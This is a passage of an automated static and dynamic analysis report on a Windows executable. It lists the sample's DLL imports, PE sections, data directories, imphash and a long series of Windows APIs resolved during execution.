- {
- "name": "SetFileSecurityA",
- "address": "0x40700c"
- },
- {
- "name": "OpenProcessToken",
- "address": "0x407010"
- },
- {
- "name": "LookupPrivilegeValueA",
- "address": "0x407014"
- },
- {
- "name": "RegEnumValueA",
- "address": "0x407018"
- },
- {
- "name": "RegDeleteKeyA",
- "address": "0x40701c"
- },
- {
- "name": "RegDeleteValueA",
- "address": "0x407020"
- },
- {
- "name": "RegCloseKey",
- "address": "0x407024"
- },
- {
- "name": "RegSetValueExA",
- "address": "0x407028"
- },
- {
- "name": "RegQueryValueExA",
- "address": "0x40702c"
- },
- {
- "name": "RegEnumKeyA",
- "address": "0x407030"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Create",
- "address": "0x407038"
- },
- {
- "name": "ImageList_AddMasked",
- "address": "0x40703c"
- },
- {
- "name": "ImageList_Destroy",
- "address": "0x407040"
- },
- {
- "name": null,
- "address": "0x407044"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "OleUninitialize",
- "address": "0x407284"
- },
- {
- "name": "OleInitialize",
- "address": "0x407288"
- },
- {
- "name": "CoTaskMemFree",
- "address": "0x40728c"
- },
- {
- "name": "CoCreateInstance",
- "address": "0x407290"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0027b04c",
- "overlay": {
- "size": "0x0025b058",
- "offset": "0x00019000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x0027b04c",
- "icon_hash": null,
- "entrypoint": "0x004031d6",
- "timestamp": "2018-12-15 22:24:22",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00006000",
- "entropy": "6.45",
- "raw_address": "0x00000400",
- "virtual_size": "0x00005f0d",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00007000",
- "size_of_data": "0x00001400",
- "entropy": "5.00",
- "raw_address": "0x00006400",
- "virtual_size": "0x00001250",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00000400",
- "entropy": "5.13",
- "raw_address": "0x00007800",
- "virtual_size": "0x0001a818",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".ndata",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00024000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000000",
- "virtual_size": "0x00009000",
- "characteristics_raw": "0xc0000080"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0002d000",
- "size_of_data": "0x00011400",
- "entropy": "1.13",
- "raw_address": "0x00007c00",
- "virtual_size": "0x000112b8",
- "characteristics_raw": "0x40000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00007430",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x000000a0"
- },
- {
- "virtual_address": "0x0002d000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x000112b8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00272c88",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x000013d0"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00007000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000298"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "3abe302b6d9a1256e6a915429af4ffd2",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 7,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "version.dll.GetFileVersionInfoA",
- "shfolder.dll.SHGetFolderPathA",
- "shlwapi.dll.#437",
- "cryptbase.dll.SystemFunction036",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "comctl32.dll.#386",
- "kernel32.dll.GetUserDefaultUILanguage",
- "shell32.dll.#680",
- "system.dll.Call",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.IsWow64Process",
- "system.dll.Int64Op",
- "kernel32.dll.SetEnvironmentVariableA",
- "kernel32.dll.Wow64EnableWow64FsRedirection",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "ole32.dll.NdrOleInitializeExtension",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.StringFromIID",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoTaskMemAlloc",
- "ole32.dll.CoTaskMemFree",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "oleaut32.dll.#500",
- "advapi32.dll.UnregisterTraceGuids",
- "comctl32.dll.#321",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "kernel32.dll.HeapSetInformation",
- "sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid",
- "dwmapi.dll.DwmIsCompositionEnabled",
- "advapi32.dll.SaferIdentifyLevel",
- "advapi32.dll.SaferComputeTokenFromLevel",
- "advapi32.dll.SaferCloseLevel",
- "ole32.dll.CLSIDFromProgIDEx",
- "wscript.exe.#1",
- "sxs.dll.SxsOleAut32RedirectTypeLibrary",
- "advapi32.dll.RegOpenKeyW",
- "advapi32.dll.RegQueryValueW",
- "shell32.dll.ShellExecuteExW",
- "ole32.dll.OleInitialize",
- "ole32.dll.CreateBindCtx",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "propsys.dll.PSPropertyBag_WriteDWORD",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "comctl32.dll.#236",
- "oleaut32.dll.#6",
- "ole32.dll.CoGetMalloc",
- "propsys.dll.PSPropertyBag_ReadDWORD",
- "propsys.dll.PSPropertyBag_ReadGUID",
- "comctl32.dll.#320",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "advapi32.dll.OpenThreadToken",
- "ole32.dll.StringFromGUID2",
- "apphelp.dll.ApphelpCheckShellObject",
- "urlmon.dll.CreateUri",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "comctl32.dll.#328",
- "comctl32.dll.#334",
- "oleaut32.dll.#2",
- "shell32.dll.#102",
- "propsys.dll.PSPropertyBag_ReadStrAlloc",
- "ole32.dll.CoInitializeEx",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.SetEntriesInAclW",
- "ntmarta.dll.GetMartaExtensionInterface",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#332",
- "comctl32.dll.#338",
- "ole32.dll.CoUninitialize",
- "sechost.dll.ConvertSidToStringSidW",
- "profapi.dll.#104",
- "propsys.dll.#430",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegGetValueW",
- "advapi32.dll.RegCloseKey",
- "ole32.dll.CoTaskMemRealloc",
- "propsys.dll.InitPropVariantFromStringAsVector",
- "propsys.dll.PSCoerceToCanonicalValue",
- "propsys.dll.PropVariantToStringAlloc",
- "ole32.dll.PropVariantClear",
- "ole32.dll.CoAllowSetForegroundWindow",
- "shell32.dll.SHGetFolderPathW",
- "advapi32.dll.SaferGetPolicyInformation",
- "ntdll.dll.RtlDllShutdownInProgress",
- "comctl32.dll.#329",
- "ole32.dll.OleUninitialize",
- "shell32.dll.#66",
- "comctl32.dll.#339",
- "comctl32.dll.#385",
- "comctl32.dll.#336",
- "comctl32.dll.#333",
- "linkinfo.dll.IsValidLinkInfo",
- "propsys.dll.#417",
- "propsys.dll.PSGetNameFromPropertyKey",
- "propsys.dll.PSStringFromPropertyKey",
- "propsys.dll.InitVariantFromBuffer",
- "oleaut32.dll.#9",
- "propsys.dll.PropVariantToGUID",
- "linkinfo.dll.CreateLinkInfoW",
- "user32.dll.IsCharAlphaW",
- "user32.dll.CharPrevW",
- "ntshrui.dll.GetNetResourceFromLocalPathW",
- "srvcli.dll.NetShareEnum",
- "cscapi.dll.CscNetApiGetInterface",
- "slc.dll.SLGetWindowsInformationDWORD",
- "shlwapi.dll.PathRemoveFileSpecW",
- "linkinfo.dll.DestroyLinkInfo",
- "propsys.dll.PropVariantToBoolean",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "cryptsp.dll.CryptReleaseContext",
- "advapi32.dll.GetSecurityInfo",
- "advapi32.dll.SetSecurityInfo",
- "advapi32.dll.GetSecurityDescriptorControl",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.RegQueryValueExW",
- "shlwapi.dll.UrlIsW",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "msvcrt.dll._set_error_mode",
- "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
- "kernel32.dll.FindActCtxSectionStringW",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "mscoree.dll.GetProcessExecutableHeap",
- "mscorwks.dll.DllGetClassObjectInternal",
- "mscorwks.dll.GetCLRFunction",
- "advapi32.dll.RegisterTraceGuidsW",
- "advapi32.dll.GetTraceLoggerHandle",
- "advapi32.dll.GetTraceEnableLevel",
- "advapi32.dll.GetTraceEnableFlags",
- "advapi32.dll.TraceEvent",
- "mscoree.dll.IEE",
- "mscorwks.dll.IEE",
- "mscoree.dll.GetStartupFlags",
- "mscoree.dll.GetHostConfigurationFile",
- "mscoree.dll.GetCORSystemDirectory",
- "ntdll.dll.RtlVirtualUnwind",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAce",
- "advapi32.dll.FreeSid",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.AddVectoredContinueHandler",
- "kernel32.dll.RemoveVectoredContinueHandler",
- "advapi32.dll.ConvertSidToStringSidW",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.GetWriteWatch",
- "kernel32.dll.ResetWriteWatch",
- "kernel32.dll.CreateMemoryResourceNotification",
- "kernel32.dll.QueryMemoryResourceNotification",
- "kernel32.dll.GlobalMemoryStatusEx",
- "ole32.dll.CoGetContextToken",
- "oleaut32.dll.#149",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GetFileAttributesExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "kernel32.dll.lstrlen",
- "kernel32.dll.lstrlenW",
- "mscoree.dll.ND_RI2",
- "kernel32.dll.lstrcpy",
- "kernel32.dll.lstrcpyW",
- "version.dll.VerLanguageNameW",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.GetCurrentProcessId",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.AdjustTokenPrivileges",
- "kernel32.dll.OpenProcess",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetModuleInformation",
- "psapi.dll.GetModuleBaseNameW",
- "psapi.dll.GetModuleFileNameExW",
- "kernel32.dll.GetExitCodeProcess",
- "ntdll.dll.NtQuerySystemInformation",
- "user32.dll.EnumWindows",
- "user32.dll.GetWindowThreadProcessId",
- "kernel32.dll.WerSetFlags",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.GetEnvironmentVariableW",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptVerifySignatureA",
- "advapi32.dll.CryptSignHashA",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.CryptEnumProvidersA",
- "cryptsp.dll.CryptImportKey",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyKey",
- "mscoree.dll.GetTokenForVTableEntry",
- "mscoree.dll.SetTargetForVTableEntry",
- "mscoree.dll.GetTargetForVTableEntry",
- "culture.dll.ConvertLangIdToCultureName",
- "ole32.dll.CoCreateGuid",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "kernel32.dll.LocalFree",
- "kernel32.dll.LocalAlloc",
- "mscoree.dll.ND_RI4",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetConsoleTitleW",
- "mscorjit.dll.getJit",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.CreateEventW",
- "ntdll.dll.WinSqmIsOptedIn",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "shfolder.dll.SHGetFolderPathW",
- "kernel32.dll.GetACP",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.GetFileType",
- "kernel32.dll.ReadFile",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.VirtualQuery",
- "secur32.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "kernel32.dll.ReleaseMutex",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.ReportEventW",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.SetEvent",
- "ole32.dll.CoGetObjectContext",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.GetProcAddress",
- "wminet_utils.dll.ResetSecurity",
- "wminet_utils.dll.SetSecurity",
- "wminet_utils.dll.BlessIWbemServices",
- "wminet_utils.dll.BlessIWbemServicesObject",
- "wminet_utils.dll.GetPropertyHandle",
- "wminet_utils.dll.WritePropertyValue",
- "wminet_utils.dll.Clone",
- "wminet_utils.dll.VerifyClientKey",
- "wminet_utils.dll.GetQualifierSet",
- "wminet_utils.dll.Get",
- "wminet_utils.dll.Put",
- "wminet_utils.dll.Delete",
- "wminet_utils.dll.GetNames",
- "wminet_utils.dll.BeginEnumeration",
- "wminet_utils.dll.Next",
- "wminet_utils.dll.EndEnumeration",
- "wminet_utils.dll.GetPropertyQualifierSet",
- "wminet_utils.dll.GetObjectText",
- "wminet_utils.dll.SpawnDerivedClass",
- "wminet_utils.dll.SpawnInstance",
- "wminet_utils.dll.CompareTo",
- "wminet_utils.dll.GetPropertyOrigin",
- "wminet_utils.dll.InheritsFrom",
- "wminet_utils.dll.GetMethod",
- "wminet_utils.dll.PutMethod",
- "wminet_utils.dll.DeleteMethod",
- "wminet_utils.dll.BeginMethodEnumeration",
- "wminet_utils.dll.NextMethod",
- "wminet_utils.dll.EndMethodEnumeration",
- "wminet_utils.dll.GetMethodQualifierSet",
- "wminet_utils.dll.GetMethodOrigin",
- "wminet_utils.dll.QualifierSet_Get",
- "wminet_utils.dll.QualifierSet_Put",
- "wminet_utils.dll.QualifierSet_Delete",
- "wminet_utils.dll.QualifierSet_GetNames",
- "wminet_utils.dll.QualifierSet_BeginEnumeration",
- "wminet_utils.dll.QualifierSet_Next",
- "wminet_utils.dll.QualifierSet_EndEnumeration",
- "wminet_utils.dll.GetCurrentApartmentType",
- "wminet_utils.dll.GetDemultiplexedStub",
- "wminet_utils.dll.CreateInstanceEnumWmi",
- "wminet_utils.dll.CreateClassEnumWmi",
- "wminet_utils.dll.ExecQueryWmi",
- "wminet_utils.dll.ExecNotificationQueryWmi",
- "wminet_utils.dll.PutInstanceWmi",
- "wminet_utils.dll.PutClassWmi",
- "wminet_utils.dll.CloneEnumWbemClassObject",
- "wminet_utils.dll.ConnectServerWmi",
- "ole32.dll.IIDFromString",
- "ole32.dll.CoCreateFreeThreadedMarshaler",
- "oleaut32.dll.SysAllocStringLen",
- "kernel32.dll.LocaleNameToLCID",
- "kernel32.dll.GetLocaleInfoEx",
- "kernel32.dll.LCIDToLocaleName",
- "kernel32.dll.GetSystemDefaultLocaleName",
- "fastprox.dll.DllGetClassObject",
- "fastprox.dll.DllCanUnloadNow",
- "dnsapi.dll.DnsApiFree",
- "oleaut32.dll.SysFreeString",
- "oleaut32.dll.#283",
- "oleaut32.dll.#284",
- "oleaut32.dll.#7",
- "oleaut32.dll.#17",
- "oleaut32.dll.#16",
- "psapi.dll.EnumProcesses",
- "kernel32.dll.FormatMessageW",
- "kernel32.dll.GetConsoleOutputCP",
- "gdi32.dll.TranslateCharsetInfo",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.WriteConsoleW",
- "kernel32.dll.WriteFile",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindClose",
- "kernel32.dll.FindNextFileW",
- "shell32.dll.SHGetFileInfo",
- "kernel32.dll.GetConsoleWindow",
- "shell32.dll.CommandLineToArgvW",
- "mscoree.dll.ND_RI8",
- "kernel32.dll.RtlMoveMemory",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.DuplicateHandle",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.GetServiceKeyNameW",
- "rpcrt4.dll.I_RpcSNCHOption",
- "advapi32.dll.GetServiceDisplayNameW",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.ChangeServiceConfigW",
- "advapi32.dll.ChangeServiceConfig2W",
- "advapi32.dll.CloseServiceHandle",
- "oleaut32.dll.GetErrorInfo",
- "oleaut32.dll.SysStringLen",
- "kernel32.dll.RegOpenKeyExW",
- "advapi32.dll.ConvertStringSidToSidW",
- "mscoree.dll.ND_RU1",
- "advapi32.dll.LsaClose",
- "advapi32.dll.LsaFreeMemory",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.LsaLookupSids",
- "advapi32.dll.QueryServiceStatus",
- "advapi32.dll.StartServiceW",
- "kernel32.dll.DeleteFileW",
- "mscoree.dll.CorExitProcess",
- "mscorwks.dll.CorExitProcess",
- "ntdll.dll.EtwUnregisterTraceGuids",
- "mscorwks.dll._CorDllMain",
- "kernel32.dll.CreateActCtxW",
- "kernel32.dll.AddRefActCtx",
- "kernel32.dll.ReleaseActCtx",
- "kernel32.dll.ActivateActCtx",
- "kernel32.dll.DeactivateActCtx",
- "kernel32.dll.GetCurrentActCtx",
- "kernel32.dll.QueryActCtxW",
- "netutils.dll.NetApiBufferFree",
- "vssapi.dll.CreateWriter",
- "advapi32.dll.LookupAccountNameW",
- "samcli.dll.NetLocalGroupGetMembers",
- "samlib.dll.SamConnect",
- "rpcrt4.dll.NdrClientCall3",
- "rpcrt4.dll.RpcStringBindingComposeW",
- "rpcrt4.dll.RpcBindingFromStringBindingW",
- "rpcrt4.dll.RpcStringFreeW",
- "rpcrt4.dll.RpcBindingFree",
- "samlib.dll.SamOpenDomain",
- "samlib.dll.SamLookupNamesInDomain",
- "samlib.dll.SamOpenAlias",
- "samlib.dll.SamFreeMemory",
- "samlib.dll.SamCloseHandle",
- "samlib.dll.SamGetMembersInAlias",
- "samlib.dll.SamEnumerateDomainsInSamServer",
- "samlib.dll.SamLookupDomainInSamServer",
- "ole32.dll.StringFromCLSID",
- "oleaut32.dll.#4",
- "propsys.dll.VariantToPropVariant",
- "wbemcore.dll.Reinitialize",
- "wbemsvc.dll.DllGetClassObject",
- "wbemsvc.dll.DllCanUnloadNow",
- "authz.dll.AuthzInitializeContextFromToken",
- "authz.dll.AuthzInitializeObjectAccessAuditEvent2",
- "authz.dll.AuthzAccessCheck",
- "authz.dll.AuthzFreeAuditEvent",
- "authz.dll.AuthzFreeContext",
- "authz.dll.AuthzInitializeResourceManager",
- "authz.dll.AuthzFreeResourceManager",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "advapi32.dll.EventRegister",
- "advapi32.dll.EventUnregister",
- "advapi32.dll.EventWrite",
- "kernel32.dll.RegCloseKey",
- "kernel32.dll.RegSetValueExW",
- "kernel32.dll.RegQueryValueExW",
- "wmisvc.dll.IsImproperShutdownDetected",
- "wevtapi.dll.EvtRender",
- "wevtapi.dll.EvtNext",
- "wevtapi.dll.EvtClose",
- "wevtapi.dll.EvtQuery",
- "wevtapi.dll.EvtCreateRenderContext",
- "rpcrt4.dll.RpcBindingSetAuthInfoExW",
- "rpcrt4.dll.RpcBindingSetOption",
- "ole32.dll.CreateStreamOnHGlobal",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegSetValueExW",
- "kernelbase.dll.InitializeAcl",
- "kernelbase.dll.AddAce",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "kernel32.dll.IsThreadAFiber",
- "kernel32.dll.OpenProcessToken",
- "kernelbase.dll.GetTokenInformation",
- "kernelbase.dll.DuplicateTokenEx",
- "kernelbase.dll.AdjustTokenPrivileges",
- "kernelbase.dll.AllocateAndInitializeSid",
- "kernelbase.dll.CheckTokenMembership",
- "kernel32.dll.SetThreadToken",
- "oleaut32.dll.#285",
- "oleaut32.dll.#286",
- "ole32.dll.CLSIDFromString",
- "oleaut32.dll.#20",
- "oleaut32.dll.#19",
- "oleaut32.dll.#25",
- "authz.dll.AuthzInitializeContextFromSid",
- "ole32.dll.CoRevertToSelf",
- "advapi32.dll.LogonUserExExW",
- "sspicli.dll.LogonUserExExW",
- "ole32.dll.CoGetCallContext",
- "ole32.dll.CoImpersonateClient",
- "ole32.dll.CoSwitchCallContext",
- "oleaut32.dll.#8",
- "oleaut32.dll.#287",
- "oleaut32.dll.#288",
- "oleaut32.dll.#289",
- "oleaut32.dll.#290",
- "advapi32.dll.EnumServicesStatusExW",
- "advapi32.dll.LsaEnumerateTrustedDomains",
- "advapi32.dll.LsaQueryInformationPolicy",
- "advapi32.dll.LsaNtStatusToWinError",
- "advapi32.dll.QueryServiceStatusEx",
- "advapi32.dll.SetSecurityDescriptorControl",
- "advapi32.dll.ConvertToAutoInheritPrivateObjectSecurity",
- "advapi32.dll.DestroyPrivateObjectSecurity",
- "advapi32.dll.AddAccessAllowedObjectAce",
- "advapi32.dll.AddAccessDeniedObjectAce",
- "advapi32.dll.AddAuditAccessObjectAce",
- "advapi32.dll.SetNamedSecurityInfoW",
- "advapi32.dll.GetNamedSecurityInfoW",
- "advapi32.dll.SetNamedSecurityInfoExW",
- "advapi32.dll.GetExplicitEntriesFromAclW",
- "advapi32.dll.GetEffectiveRightsFromAclW",
- "ws2_32.dll.#115",
- "iphlpapi.dll.GetAdaptersAddresses",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.#116",
- "advapi32.dll.CreateWellKnownSid",
- "netapi32.dll.NetGroupEnum",
- "netapi32.dll.NetGroupGetInfo",
- "netapi32.dll.NetGroupSetInfo",
- "netapi32.dll.NetLocalGroupGetInfo",
- "netapi32.dll.NetLocalGroupSetInfo",
- "netapi32.dll.NetGroupGetUsers",
- "netapi32.dll.NetLocalGroupGetMembers",
- "netapi32.dll.NetLocalGroupEnum",
- "netapi32.dll.NetShareEnum",
- "netapi32.dll.NetShareGetInfo",
- "netapi32.dll.NetShareAdd",
- "netapi32.dll.NetShareEnumSticky",
- "netapi32.dll.NetShareSetInfo",
- "netapi32.dll.NetShareDel",
- "netapi32.dll.NetShareDelSticky",
- "netapi32.dll.NetShareCheck",
- "netapi32.dll.NetUserEnum",
- "netapi32.dll.NetUserGetInfo",
- "netapi32.dll.NetUserSetInfo",
- "netapi32.dll.NetApiBufferFree",
- "netapi32.dll.NetQueryDisplayInformation",
- "netapi32.dll.NetServerSetInfo",
- "netapi32.dll.NetServerGetInfo",
- "netapi32.dll.NetGetDCName",
- "netapi32.dll.NetWkstaGetInfo",
- "netapi32.dll.NetGetAnyDCName",
- "netapi32.dll.NetServerEnum",
- "netapi32.dll.NetUserModalsGet",
- "netapi32.dll.NetScheduleJobAdd",
- "netapi32.dll.NetScheduleJobDel",
- "netapi32.dll.NetScheduleJobEnum",
- "netapi32.dll.NetScheduleJobGetInfo",
- "netapi32.dll.NetUseGetInfo",
- "netapi32.dll.NetEnumerateTrustedDomains",
- "netapi32.dll.DsGetDcNameW",
- "netapi32.dll.DsRoleGetPrimaryDomainInformation",
- "netapi32.dll.DsRoleFreeMemory",
- "netapi32.dll.NetRenameMachineInDomain",
- "netapi32.dll.NetJoinDomain",
- "netapi32.dll.NetUnjoinDomain",
- "oleaut32.dll.#150",
- "samlib.dll.SamQueryInformationDomain",
- "samlib.dll.SamEnumerateAliasesInDomain",
- "samlib.dll.SamQueryInformationAlias",
- "advapi32.dll.InitiateSystemShutdownExW",
- "ole32.dll.CoInitializeSecurity",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.SetLastError",
- "kernel32.dll.GetModuleHandleExW",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Thread32First",
- "kernel32.dll.OpenThread",
- "kernel32.dll.ResumeThread",
- "kernel32.dll.SuspendThread",
- "kernel32.dll.Thread32Next",
- "kernel32.dll.GetModuleHandleW",
- "kernel32.dll.FindResourceW",
- "kernel32.dll.LoadResource",
- "kernel32.dll.LoadLibraryExW",
- "kernel32.dll.WriteProcessMemory",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.ReadProcessMemory",
- "kernel32.dll.SetFilePointerEx",
- "kernel32.dll.SetStdHandle",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.IsProcessorFeaturePresent",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.RtlPcToFileHeader",
- "kernel32.dll.RaiseException",
- "kernel32.dll.HeapFree",
- "kernel32.dll.IsValidCodePage",
- "kernel32.dll.GetOEMCP",
